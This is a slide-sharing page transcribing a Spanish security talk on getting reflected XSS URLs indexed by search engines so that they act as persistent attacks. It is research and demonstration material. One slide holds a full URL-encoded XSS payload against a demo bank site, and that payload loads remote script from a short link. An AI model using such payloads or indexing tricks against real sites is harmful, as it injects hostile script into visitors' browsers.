Upload File

xss google persistentes

28
Ataques XSS Google Persistentes Chema Alonso

Upload: chema-alonso

Post on 11-Jun-2015

579 views

Category:

Technology


3 download

Report

DESCRIPTION

Conferencia impartida en el Asegúr@IT Camp 2, en el año 2010, por Chema Alonso sobre cómo se pueden indexar XSS Reflejados para convertirlos en XSS Google Persistentes. El vídeo de la conferencia está en la siguiente URL: https://www.youtube.com/watch?v=0KYnnITHLNU

TRANSCRIPT

Page 1: XSS Google Persistentes

Ataques XSS Google Persistentes

Chema Alonso

Page 2: XSS Google Persistentes

Buscadores como Arma

Búsqueda de informaciónBúsqueda de vulnerabilidades

Distribución de malwareEjecución de comandosAtaques XSS

Page 3: XSS Google Persistentes

Búsqueda de información

Page 4: XSS Google Persistentes

Búsqueda de passwords

Page 5: XSS Google Persistentes

Distribución de malware en Apple.com

Page 6: XSS Google Persistentes

BrowserShots

Page 7: XSS Google Persistentes

Caché de ataques SQL

Page 8: XSS Google Persistentes

Servicios de PING

Page 9: XSS Google Persistentes

Análisis Forense

Page 10: XSS Google Persistentes

XSS Persistentes Se inyectan en el repositorio de datos de la

aplicación Bases de datos Correos Web

Tienen cierto nivel de complejidad Tienen que ocultarse a los ojos de los

administradores Están en los datos Pueden tener consecuencias inesperadas

Page 11: XSS Google Persistentes

XSS No Persistentes

Page 12: XSS Google Persistentes

¿Cómo se descubren?

PentestingAcunetix free-editionEl blog de Eduardo Abril Just Googling

Page 13: XSS Google Persistentes

FBI y sus XSS

Page 14: XSS Google Persistentes

NASA y XSS

Page 15: XSS Google Persistentes

Dominio .mil

Page 16: XSS Google Persistentes

Oracle

Page 17: XSS Google Persistentes

Google

Page 18: XSS Google Persistentes

«Last-minute» XSS

Page 19: XSS Google Persistentes

Scripts de Búsqueda

Page 20: XSS Google Persistentes

The Facts Google Indexa URLs con XSS Un alto porcentaje de usuarios llega por

buscadores

Page 21: XSS Google Persistentes

The Facts…

Bueno… «buscadores means Google»

Page 22: XSS Google Persistentes

Conclusión Se puede dar de alta una URL con un XSS no

persistente Servicio de alta de URLs Enlazado en una web indexada

Se puede posicionar con técnicas Black SEO

Page 23: XSS Google Persistentes

Bank Of Maligno Web «copia» de Bank of América XSS No Persistente en search.aspx URL de ataque:

http://bankofmaligno.informatica64.com/search.aspx?S=%22%68%6F%6C%61%3C%73%63%72%69%70%74%20%66%6F%72%3D%77%69%6E%64%6F%77%20%65%76%65%6E%74%3D%6F%6E%6C%6F%61%64%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%69%74%2E%6C%79%2F%64%63%73%65%4E%49%22%3E%3C%2F%73%63%72%69%70%74%3E

Dada de alta en Google & Bing manualmente Dada de alta en Blog «Un informático en el

lado del mal»

Page 24: XSS Google Persistentes

Bank Of Maligno

Page 25: XSS Google Persistentes

Bank Of Maligno

Page 26: XSS Google Persistentes

Bank Of Maligno

Page 27: XSS Google Persistentes

Conclusiones No hay filtrado de URLs

Ataques SQL Injection Ataques XSS

Indexar un XSS en Google (u otro buscador) es convertirlo en un % Persistente

Protección SEO + Protección robots.txt

Page 28: XSS Google Persistentes

¿Preguntas? Chema Alonso

[email protected] http://twitter.com/chemaalonso http://www.informatica64.com

Blogs http://www.elladodelmal.com http://www.windowstecnico.com http://www.seguridadapple.com http://www.forefront-es.com http://www.puntocompartido.com/blogshare http://www.exchangespain.com

mailto:[email protected]
http://twitter.com/chemaalonso
http://www.informatica64.com/
http://www.elladodelmal.com/
http://www.windowstecnico.com/
http://www.windowstecnico.com/
http://www.seguridadapple.com/
http://www.forefront-es.com/
http://www.puntocompartido.com/blogshare
http://www.exchangespain.com/

4. Daños por contaminación de hidrocarburos persistentes

Contaminantes orgánicos persistentes. Determinación

Sustancias Químicas y Componentes Orgánicos Persistentes

Pni (contaminantes organicos persistentes)

Contaminantes organicos persistentes (cops )

Charla Objetos Persistentes

Artículo 14. Videojuegos de universos persistentes. La ...revistacomunicacion.org/pdf/n7/articulos/a14_Video... · Resumen: Los juegos de universos virtuales persistentes se están

Aspectos Comunes de Las Enfermedades Virales Persistentes

Ontiveros, Asunción Imaginarios persistentes en las

METALES Y CONTAMINANTES ORGÁNICOS PERSISTENTES EN … · Los productos químicos conocidos como contaminantes orgánicos persistentes (COPs) son potentes plaguicidas o sirven para

Protección de endpoints contra las amenazas persistentes

Vulnerabilidades Persistentes

DESIGUALDADES SOCIO-TERRITORIALES PERSISTENTES: UNA …

Cross Site Scripting (XSS) From alert to pownage - owasp.org · XSS Reflejado • El atacante genera un link que contiene el código malicioso • Se hace disponible ese link a la

Ataques XSS con javascript por diversión y beneficio4party Ataques XSS (2). Dando por el culo con alerts Una forma simple de tocar las narices a los usuarios es meter alerts interminables

CONVENIO DE ESTOCOLMO SOBRE CONTAMINANTES ORGÁNICOS PERSISTENTES COP CONVENIO DE ESTOCOLMO SOBRE CONTAMINANTES ORGANICOS PERSISTENTES, LOS NUEVOS COP Y

Amenazas Persistentes Avanzadas o «Advanced Persistant Threats

Ataques XSS Google Persistentes

Prevencion ante ataques XSS - Betabeers Córdoba (29/11/2012)

Amenazas Persistentes Avanzadas - Naullibres

Informe de divulgación Amenazas Avanzadas Persistentes - …

Presencia de agroquímicos persistentes en tres

Proyecto Quimica; Deteccion de Compuestos Organicos Persistentes (Pesticidas)

ADMINISTRACION DE REDES SECUNECIA DE COMANDOS EN SITIOS CRUZADOS(XSS) DIEGO ALEXANDER MADRID DUQUE

MANIFESTACIONES PERSISTENTES DE LA COVID-19 GUÍA DE

Problemáticas Persistentes y Desafíos Pendientes en la

Leer Para T3. Contaminantes Orgánicos Persistentes

Contaminantes orgánicos persistentes situacion en méxico

ACTOR ARTÍCULO DESCRIPCIÓN181.225.72.78/.../talleres-siac/Presentacion_PCBs.pdf · Compuestos Orgánicos Persistentes (COP) Son compuestos orgánicos persistentes (COP) con características

Infecciones virales persistentes latentes Herpesvirus

Estructuras Persistentes - UNR

Gestión de Contaminantes Orgánicos Persistentes

LOS CONTAMINANTES ORGÁNICOS PERSISTENTES SITUACIÓN EN MÉXICO

A2 Cross-Site Scripting (XSS).pptx

Corporación Ornitorrinco Labs · 2020. 1. 17. · A3-Secuencia de comandos en sitios cruzados XSS A4-Fallas de cross site scripting XSS A4-Fallas de cross site scripting XSS A4-Referencia